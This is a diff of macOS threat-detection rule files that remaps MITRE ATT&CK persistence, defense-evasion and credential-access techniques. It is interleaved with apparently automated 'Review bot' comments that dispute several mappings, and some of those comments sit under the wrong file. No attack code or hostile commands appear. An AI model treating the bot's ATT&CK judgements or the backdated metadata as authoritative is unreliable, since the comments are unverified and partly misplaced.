@@ -48,7 +48,14 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "medium" -tags = ["Domain: Endpoint", "OS: macOS", "Use Case: Threat Detection", "Tactic: Credential Access", "Tactic: Persistence", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" @@ -96,26 +103,19 @@ Authorization plugins in macOS extend authentication capabilities, enabling feat [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1556" -name = "Modify Authentication Process" -reference = "https://attack.mitre.org/techniques/T1556/" - -[rule.threat.tactic] -id = "TA0006" -name = "Credential Access" -reference = "https://attack.mitre.org/tactics/TA0006/" +id = "T1547" +name = "Boot or Logon Autostart Execution" +reference = "https://attack.mitre.org/techniques/T1547/" +[[rule.threat.technique.subtechnique]] +id = "T1547.002" +name = "Authentication Package" +reference = "https://attack.mitre.org/techniques/T1547/002/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1556" -name = "Modify Authentication Process" -reference = "https://attack.mitre.org/techniques/T1556/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + diff --git a/rules/macos/persistence_curl_execution_via_shell_profile.toml b/rules/macos/persistence_curl_execution_via_shell_profile.toml index 3f1779cb36f..7be128e76cb 100644 --- a/rules/macos/persistence_curl_execution_via_shell_profile.toml +++ b/rules/macos/persistence_curl_execution_via_shell_profile.toml 
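Review bot: The new mapping `id = "T1547.002"` / `name = "Authentication Package"` is, as far as I recall, a Windows-only sub-technique (LSA authentication packages), so applying it to macOS authorization plugins should be checked against the current ATT&CK platform list before the T1556 Modify Authentication Process entry and the `Tactic: Credential Access` tag are dropped. The old side carried T1556 twice (once under Credential Access, once under Persistence), which the duplicated-tactic test in this series would not have flagged since the tactics differ; the new side fixes that duplication, but if T1547.002 turns out not to apply to macOS, T1556 under Persistence with the Credential Access entry retained is the safer mapping.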
@@ -2,7 +2,7 @@ creation_date = "2026/01/30" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/30" [rule] author = ["Elastic"] @@ -81,30 +81,30 @@ sequence with maxspan=10s [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1105" -name = "Ingress Tool Transfer" -reference = "https://attack.mitre.org/techniques/T1105/" + [rule.threat.tactic] + name = "Persistence" + id = "TA0003" + reference = "https://attack.mitre.org/tactics/TA0003/" -[rule.threat.tactic] -id = "TA0011" -name = "Command and Control" -reference = "https://attack.mitre.org/tactics/TA0011/" + [[rule.threat.technique]] + name = "Event Triggered Execution" + id = "T1546" + reference = "https://attack.mitre.org/techniques/T1546/" + + [[rule.threat.technique.subtechnique]] + name = "Unix Shell Configuration Modification" + id = "T1546.004" + reference = "https://attack.mitre.org/techniques/T1546/004/" [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1546" -name = "Event Triggered Execution" -reference = "https://attack.mitre.org/techniques/T1546/" - -[[rule.threat.technique.subtechnique]] -id = "T1546.004" -name = "Unix Shell Configuration Modification" -reference = "https://attack.mitre.org/techniques/T1546/004/" + [rule.threat.tactic] + name = "Command and Control" + id = "TA0011" + reference = "https://attack.mitre.org/tactics/TA0011/" -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" + [[rule.threat.technique]] + name = "Ingress Tool Transfer" + id = "T1105" + reference = "https://attack.mitre.org/techniques/T1105/" diff --git a/rules/macos/persistence_defense_evasion_hidden_launch_agent_deamon_logonitem_process.toml b/rules/macos/persistence_defense_evasion_hidden_launch_agent_deamon_logonitem_process.toml index 67553e9d6fd..1feff70a4d6 100644 
--- a/rules/macos/persistence_defense_evasion_hidden_launch_agent_deamon_logonitem_process.toml +++ b/rules/macos/persistence_defense_evasion_hidden_launch_agent_deamon_logonitem_process.toml @@ -2,7 +2,7 @@ creation_date = "2020/01/07" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/18" [rule] author = ["Elastic"] @@ -103,41 +103,36 @@ Launchd is a key macOS system process responsible for managing system and user s [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1543" +name = "Create or Modify System Process" +reference = "https://attack.mitre.org/techniques/T1543/" +[[rule.threat.technique.subtechnique]] +id = "T1543.001" +name = "Launch Agent" +reference = "https://attack.mitre.org/techniques/T1543/001/" + + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1564" name = "Hide Artifacts" reference = "https://attack.mitre.org/techniques/T1564/" - [[rule.threat.technique.subtechnique]] id = "T1564.001" name = "Hidden Files and Directories" reference = "https://attack.mitre.org/techniques/T1564/001/" + + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1543" -name = "Create or Modify System Process" -reference = "https://attack.mitre.org/techniques/T1543/" - -[[rule.threat.technique.subtechnique]] -id = "T1543.001" -name = "Launch Agent" -reference = "https://attack.mitre.org/techniques/T1543/001/" - -[[rule.threat.technique.subtechnique]] -id = "T1543.004" -name = "Launch Daemon" -reference = "https://attack.mitre.org/techniques/T1543/004/" - -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" 
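Review bot: The new side drops the `T1543.004` Launch Daemon sub-technique and keeps only `T1543.001` Launch Agent, yet the filename covers launch daemons as well as agents, so daemon-based persistence no longer has a mapping. Unless the query was narrowed to agent paths only (it is outside this hunk), keep both sub-techniques under T1543. The same removal of `T1543.004` happens in persistence_evasion_hidden_launch_agent_deamon_creation.toml, persistence_hidden_plist_filename.toml and persistence_python_launch_agent_or_daemon_creation_first_occurrence.toml, the last of which names daemons in its own title. The reorder of the two threat entries here is content-neutral and only adds blank-line churn.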
diff --git a/rules/macos/persistence_docker_shortcuts_plist_modification.toml b/rules/macos/persistence_docker_shortcuts_plist_modification.toml index 42daa3071bf..60cccae6d72 100644 --- a/rules/macos/persistence_docker_shortcuts_plist_modification.toml +++ b/rules/macos/persistence_docker_shortcuts_plist_modification.toml @@ -2,7 +2,7 @@ creation_date = "2020/12/18" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/18" [rule] author = ["Elastic"] @@ -102,18 +102,14 @@ Docker shortcuts on macOS are managed through dock property lists, which define [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1547" -name = "Boot or Logon Autostart Execution" -reference = "https://attack.mitre.org/techniques/T1547/" +id = "T1543" +name = "Create or Modify System Process" +reference = "https://attack.mitre.org/techniques/T1543/" -[[rule.threat.technique.subtechnique]] -id = "T1547.009" -name = "Shortcut Modification" -reference = "https://attack.mitre.org/techniques/T1547/009/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + diff --git a/rules/macos/persistence_enable_root_account.toml b/rules/macos/persistence_enable_root_account.toml index bd1836e5468..5e06d5edddf 100644 --- a/rules/macos/persistence_enable_root_account.toml +++ b/rules/macos/persistence_enable_root_account.toml @@ -2,7 +2,7 @@ creation_date = "2020/01/04" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/18" [rule] author = ["Elastic"] 
@@ -44,7 +44,14 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "medium" -tags = ["Domain: Endpoint", "OS: macOS", "Use Case: Threat Detection", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" @@ -90,26 +97,19 @@ In macOS environments, the root account is typically disabled to enhance securit [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" +[[rule.threat.technique.subtechnique]] +id = "T1078.003" +name = "Local Accounts" +reference = "https://attack.mitre.org/techniques/T1078/003/" + + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" - -[rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/macos/persistence_evasion_hidden_launch_agent_deamon_creation.toml b/rules/macos/persistence_evasion_hidden_launch_agent_deamon_creation.toml index 43ae3627d71..49dd1c7435c 100644 --- a/rules/macos/persistence_evasion_hidden_launch_agent_deamon_creation.toml +++ b/rules/macos/persistence_evasion_hidden_launch_agent_deamon_creation.toml 
@@ -2,7 +2,7 @@ creation_date = "2020/01/05" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/18" [rule] author = ["Elastic"] @@ -101,36 +101,36 @@ Launch agents and daemons in macOS are background services that start at login o [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1543" +name = "Create or Modify System Process" +reference = "https://attack.mitre.org/techniques/T1543/" +[[rule.threat.technique.subtechnique]] +id = "T1543.001" +name = "Launch Agent" +reference = "https://attack.mitre.org/techniques/T1543/001/" + + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1564" name = "Hide Artifacts" reference = "https://attack.mitre.org/techniques/T1564/" - [[rule.threat.technique.subtechnique]] id = "T1564.001" name = "Hidden Files and Directories" reference = "https://attack.mitre.org/techniques/T1564/001/" + + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1543" -name = "Create or Modify System Process" -reference = "https://attack.mitre.org/techniques/T1543/" - -[[rule.threat.technique.subtechnique]] -id = "T1543.004" -name = "Launch Daemon" -reference = "https://attack.mitre.org/techniques/T1543/004/" - -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/macos/persistence_finder_sync_plugin_pluginkit.toml b/rules/macos/persistence_finder_sync_plugin_pluginkit.toml index ad0e9957b10..4f500cad3cc 100644 --- a/rules/macos/persistence_finder_sync_plugin_pluginkit.toml +++ b/rules/macos/persistence_finder_sync_plugin_pluginkit.toml 
@@ -2,7 +2,7 @@ creation_date = "2020/12/18" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/18" [rule] author = ["Elastic"] @@ -102,13 +102,14 @@ Finder Sync plugins enhance macOS Finder by allowing third-party applications to [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1546" -name = "Event Triggered Execution" -reference = "https://attack.mitre.org/techniques/T1546/" +id = "T1543" +name = "Create or Modify System Process" +reference = "https://attack.mitre.org/techniques/T1543/" + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + diff --git a/rules/macos/persistence_folder_action_scripts_runtime.toml b/rules/macos/persistence_folder_action_scripts_runtime.toml index 832dfbbeb8d..46944a678eb 100644 --- a/rules/macos/persistence_folder_action_scripts_runtime.toml +++ b/rules/macos/persistence_folder_action_scripts_runtime.toml @@ -2,7 +2,7 @@ creation_date = "2020/12/07" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/18" [rule] author = ["Elastic"] @@ -45,7 +45,15 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "medium" -tags = ["Domain: Endpoint", "OS: macOS", "Use Case: Threat Detection", "Tactic: Persistence", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Execution", + "Tactic: Persistence", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" 
@@ -93,13 +101,26 @@ Folder Action scripts on macOS automate tasks by executing scripts when folder c [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1546" -name = "Event Triggered Execution" -reference = "https://attack.mitre.org/techniques/T1546/" +id = "T1037" +name = "Boot or Logon Initialization Scripts" +reference = "https://attack.mitre.org/techniques/T1037/" + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + diff --git a/rules/macos/persistence_hidden_plist_filename.toml b/rules/macos/persistence_hidden_plist_filename.toml index f2211c46f55..607ab2f4f82 100644 --- a/rules/macos/persistence_hidden_plist_filename.toml +++ b/rules/macos/persistence_hidden_plist_filename.toml @@ -2,7 +2,7 @@ creation_date = "2026/01/30" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/30" [rule] author = ["Elastic"] 
@@ -87,40 +87,45 @@ file where host.os.type == "macos" and event.type != "deletion" and [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1564" -name = "Hide Artifacts" -reference = "https://attack.mitre.org/techniques/T1564/" + [rule.threat.tactic] + name = "Persistence" + id = "TA0003" + reference = "https://attack.mitre.org/tactics/TA0003/" -[[rule.threat.technique.subtechnique]] -id = "T1564.001" -name = "Hidden Files and Directories" -reference = "https://attack.mitre.org/techniques/T1564/001/" + [[rule.threat.technique]] + name = "Boot or Logon Autostart Execution" + id = "T1547" + reference = "https://attack.mitre.org/techniques/T1547/" -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" + [[rule.threat.technique.subtechnique]] + name = "Plist Modification" + id = "T1547.011" + reference = "https://attack.mitre.org/techniques/T1547/011/" + + [[rule.threat.technique]] + name = "Create or Modify System Process" + id = "T1543" + reference = "https://attack.mitre.org/techniques/T1543/" + + [[rule.threat.technique.subtechnique]] + name = "Launch Agent" + id = "T1543.001" + reference = "https://attack.mitre.org/techniques/T1543/001/" [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1543" -name = "Create or Modify System Process" -reference = "https://attack.mitre.org/techniques/T1543/" - -[[rule.threat.technique.subtechnique]] -id = "T1543.001" -name = "Launch Agent" -reference = "https://attack.mitre.org/techniques/T1543/001/" - -[[rule.threat.technique.subtechnique]] -id = "T1543.004" -name = "Launch Daemon" -reference = "https://attack.mitre.org/techniques/T1543/004/" - -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" + [rule.threat.tactic] + name = "Defense Evasion" + id = "TA0005" + reference = "https://attack.mitre.org/tactics/TA0005/" + + [[rule.threat.technique]] + name 
= "Hide Artifacts" + id = "T1564" + reference = "https://attack.mitre.org/techniques/T1564/" + + [[rule.threat.technique.subtechnique]] + name = "Hidden Files and Directories" + id = "T1564.001" + reference = "https://attack.mitre.org/techniques/T1564/001/" diff --git a/rules/macos/persistence_login_logout_hooks_defaults.toml b/rules/macos/persistence_login_logout_hooks_defaults.toml index 59365456675..40020db35c3 100644 --- a/rules/macos/persistence_login_logout_hooks_defaults.toml +++ b/rules/macos/persistence_login_logout_hooks_defaults.toml @@ -2,7 +2,7 @@ creation_date = "2020/12/07" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/02/04" [rule] author = ["Elastic"] @@ -108,18 +108,14 @@ In macOS environments, login and logout hooks are scripts executed automatically [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1037" name = "Boot or Logon Initialization Scripts" reference = "https://attack.mitre.org/techniques/T1037/" -[[rule.threat.technique.subtechnique]] -id = "T1037.002" -name = "Login Hook" -reference = "https://attack.mitre.org/techniques/T1037/002/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + diff --git a/rules/macos/persistence_loginwindow_plist_modification.toml b/rules/macos/persistence_loginwindow_plist_modification.toml index d3fc418339c..7603cbada1f 100644 --- a/rules/macos/persistence_loginwindow_plist_modification.toml +++ b/rules/macos/persistence_loginwindow_plist_modification.toml @@ -2,7 +2,7 @@ creation_date = "2021/01/21" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/01/15" [rule] author = ["Elastic"] 
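Review bot: The new side maps `id = "T1547.011"` / `name = "Plist Modification"`, a sub-technique that ATT&CK revoked in favour of T1647 Plist File Modification — the very technique that the persistence_loginwindow_plist_modification.toml and persistence_creation_hidden_login_item_osascript.toml hunks in this same change use. Replace the sub-technique block with a separate `[[rule.threat]]` entry for `id = "T1647"` under Defense Evasion (or drop it, since T1543.001 already covers the persistence aspect), otherwise the repository's ATT&CK deprecation check will likely reject the rule. Note that this hunk's lines are split across two physical lines on the page (`name` / `= "Hide Artifacts"`), which a layout repair would need hunk-header counts to restore safely.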
@@ -67,18 +67,26 @@ event.category:file and host.os.type:macos and not event.type:"deletion" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1037" -name = "Boot or Logon Initialization Scripts" -reference = "https://attack.mitre.org/techniques/T1037/" +id = "T1547" +name = "Boot or Logon Autostart Execution" +reference = "https://attack.mitre.org/techniques/T1547/" -[[rule.threat.technique.subtechnique]] -id = "T1037.002" -name = "Login Hook" -reference = "https://attack.mitre.org/techniques/T1037/002/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1647" +name = "Plist File Modification" +reference = "https://attack.mitre.org/techniques/T1647/" + + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/macos/persistence_manual_chromium_extension_loading.toml b/rules/macos/persistence_manual_chromium_extension_loading.toml index b22050039bd..245e2cd90cc 100644 --- a/rules/macos/persistence_manual_chromium_extension_loading.toml +++ b/rules/macos/persistence_manual_chromium_extension_loading.toml @@ -2,7 +2,7 @@ creation_date = "2026/01/30" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/30" [rule] author = ["Elastic"] 
@@ -23,7 +23,15 @@ references = [ risk_score = 73 rule_id = "f1f3070e-045c-4e03-ae58-d11d43d2ee51" severity = "high" -tags = ["Domain: Endpoint", "OS: macOS", "Use Case: Threat Detection", "Tactic: Persistence", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Credential Access", + "Data Source: Elastic Defend", + "Resources: Investigation Guide" +] timestamp_override = "event.ingested" type = "eql" note = """## Triage and analysis @@ -78,17 +86,25 @@ process where host.os.type == "macos" and event.action == "exec" and [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1176" -name = "Software Extensions" -reference = "https://attack.mitre.org/techniques/T1176/" + [rule.threat.tactic] + name = "Persistence" + id = "TA0003" + reference = "https://attack.mitre.org/tactics/TA0003/" + + [[rule.threat.technique]] + name = "Software Extensions" + id = "T1176" + reference = "https://attack.mitre.org/techniques/T1176/" + +[[rule.threat]] +framework = "MITRE ATT&CK" -[[rule.threat.technique.subtechnique]] -id = "T1176.001" -name = "Browser Extensions" -reference = "https://attack.mitre.org/techniques/T1176/001/" + [rule.threat.tactic] + name = "Credential Access" + id = "TA0006" + reference = "https://attack.mitre.org/tactics/TA0006/" -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" + [[rule.threat.technique]] + name = "Steal Web Session Cookie" + id = "T1539" + reference = "https://attack.mitre.org/techniques/T1539/" diff --git a/rules/macos/persistence_periodic_tasks_file_mdofiy.toml b/rules/macos/persistence_periodic_tasks_file_mdofiy.toml index acb351b0c87..003ac42c087 100644 --- a/rules/macos/persistence_periodic_tasks_file_mdofiy.toml +++ b/rules/macos/persistence_periodic_tasks_file_mdofiy.toml 
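Review bot: The rewritten threat block in persistence_manual_chromium_extension_loading.toml (`@@ -78,17 +86,25 @@`) uses indented keys with `[rule.threat.tactic]` placed before `[[rule.threat.technique]]`, while every other threat block in this patch is unindented with the techniques first and the tactic last; persistence_startup_item_plist_creation.toml in this same patch uses the indented form as well. TOML accepts both layouts, but mixing them makes the rule files harder to diff and review, and if the repo's rule tooling normalises TOML these blocks will be rewritten again on the next pass. Settling on one layout, ideally the unindented technique-then-tactic order the rest of the corpus uses, keeps the diff noise down.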
@@ -2,7 +2,7 @@ creation_date = "2021/01/21" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/18" [rule] author = ["Elastic"] @@ -101,13 +101,19 @@ Periodic tasks in macOS are scheduled operations that automate system maintenanc [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1053" name = "Scheduled Task/Job" reference = "https://attack.mitre.org/techniques/T1053/" +[[rule.threat.technique.subtechnique]] +id = "T1053.003" +name = "Cron" +reference = "https://attack.mitre.org/techniques/T1053/003/" + + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + diff --git a/rules/macos/persistence_python_launch_agent_or_daemon_creation_first_occurrence.toml b/rules/macos/persistence_python_launch_agent_or_daemon_creation_first_occurrence.toml index 5aa6e70b92d..2c5cd8c4634 100644 --- a/rules/macos/persistence_python_launch_agent_or_daemon_creation_first_occurrence.toml +++ b/rules/macos/persistence_python_launch_agent_or_daemon_creation_first_occurrence.toml @@ -2,7 +2,7 @@ creation_date = "2026/02/23" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/23" [rule] author = ["Elastic"] @@ -73,26 +73,20 @@ process.name:python* [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1543" name = "Create or Modify System Process" reference = "https://attack.mitre.org/techniques/T1543/" - [[rule.threat.technique.subtechnique]] id = "T1543.001" name = "Launch Agent" reference = "https://attack.mitre.org/techniques/T1543/001/" -[[rule.threat.technique.subtechnique]] -id = "T1543.004" -name = "Launch Daemon" -reference = "https://attack.mitre.org/techniques/T1543/004/" - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + [rule.new_terms] field = "new_terms_fields" value = ["host.id", "file.path"] 
diff --git a/rules/macos/persistence_screensaver_plist_file_modification.toml b/rules/macos/persistence_screensaver_plist_file_modification.toml index 570027ab544..44791980400 100644 --- a/rules/macos/persistence_screensaver_plist_file_modification.toml +++ b/rules/macos/persistence_screensaver_plist_file_modification.toml @@ -2,7 +2,7 @@ creation_date = "2021/10/05" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/18" [rule] author = ["Elastic"] @@ -101,18 +101,14 @@ file where host.os.type == "macos" and event.action == "modification" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1546" name = "Event Triggered Execution" reference = "https://attack.mitre.org/techniques/T1546/" -[[rule.threat.technique.subtechnique]] -id = "T1546.002" -name = "Screensaver" -reference = "https://attack.mitre.org/techniques/T1546/002/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + diff --git a/rules/macos/persistence_startup_item_plist_creation.toml b/rules/macos/persistence_startup_item_plist_creation.toml index cecfc474f78..0ff3d1f2258 100644 --- a/rules/macos/persistence_startup_item_plist_creation.toml +++ b/rules/macos/persistence_startup_item_plist_creation.toml @@ -2,7 +2,7 @@ creation_date = "2026/01/30" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/30" [rule] author = ["Elastic"] 
@@ -23,7 +23,14 @@ references = [ risk_score = 73 rule_id = "15606250-449d-46a8-aaff-4043e42aefb9" severity = "high" -tags = ["Domain: Endpoint", "OS: macOS", "Use Case: Threat Detection", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Data Source: Elastic Defend", + "Resources: Investigation Guide" +] timestamp_override = "event.ingested" type = "eql" note = """## Triage and analysis @@ -73,35 +80,17 @@ file where host.os.type == "macos" and event.type != "deletion" and [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1037" -name = "Boot or Logon Initialization Scripts" -reference = "https://attack.mitre.org/techniques/T1037/" - -[[rule.threat.technique.subtechnique]] -id = "T1037.005" -name = "Startup Items" -reference = "https://attack.mitre.org/techniques/T1037/005/" - -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1037" -name = "Boot or Logon Initialization Scripts" -reference = "https://attack.mitre.org/techniques/T1037/" + [rule.threat.tactic] + name = "Persistence" + id = "TA0003" + reference = "https://attack.mitre.org/tactics/TA0003/" -[[rule.threat.technique.subtechnique]] -id = "T1037.005" -name = "Startup Items" -reference = "https://attack.mitre.org/techniques/T1037/005/" + [[rule.threat.technique]] + name = "Boot or Logon Initialization Scripts" + id = "T1037" + reference = "https://attack.mitre.org/techniques/T1037/" -[rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" + [[rule.threat.technique.subtechnique]] + name = "Startup Items" + id = "T1037.005" + reference = "https://attack.mitre.org/techniques/T1037/005/" 
diff --git a/rules/macos/persistence_via_atom_init_file_modification.toml b/rules/macos/persistence_via_atom_init_file_modification.toml index b1de5ec77cb..eff66a14bca 100644 --- a/rules/macos/persistence_via_atom_init_file_modification.toml +++ b/rules/macos/persistence_via_atom_init_file_modification.toml @@ -2,7 +2,7 @@ creation_date = "2021/01/21" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/18" [rule] author = ["Elastic"] @@ -102,13 +102,14 @@ Atom, a popular text editor, allows customization via the `init.coffee` script, [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1546" -name = "Event Triggered Execution" -reference = "https://attack.mitre.org/techniques/T1546/" +id = "T1037" +name = "Boot or Logon Initialization Scripts" +reference = "https://attack.mitre.org/techniques/T1037/" + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + diff --git a/rules/macos/privilege_escalation_applescript_with_admin_privs.toml b/rules/macos/privilege_escalation_applescript_with_admin_privs.toml index 9110c01cb84..ca5bd4627c0 100644 --- a/rules/macos/privilege_escalation_applescript_with_admin_privs.toml +++ b/rules/macos/privilege_escalation_applescript_with_admin_privs.toml @@ -2,7 +2,7 @@ creation_date = "2020/12/27" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/18" [rule] author = ["Elastic"] 
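Review bot: The new side of the `@@ -102,13 +102,14 @@` hunk maps persistence_via_atom_init_file_modification.toml to T1037 "Boot or Logon Initialization Scripts" instead of T1546 "Event Triggered Execution". ATT&CK scopes T1037 to scripts the OS runs at boot or user logon, whereas the hunk's context line describes `init.coffee` as Atom's own customization script, which the editor evaluates when it starts; that is application-triggered execution and fits the previous T1546 mapping better. Worth confirming the intent before the technique changes; if T1037 is deliberate, the rule's `note` should say why.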
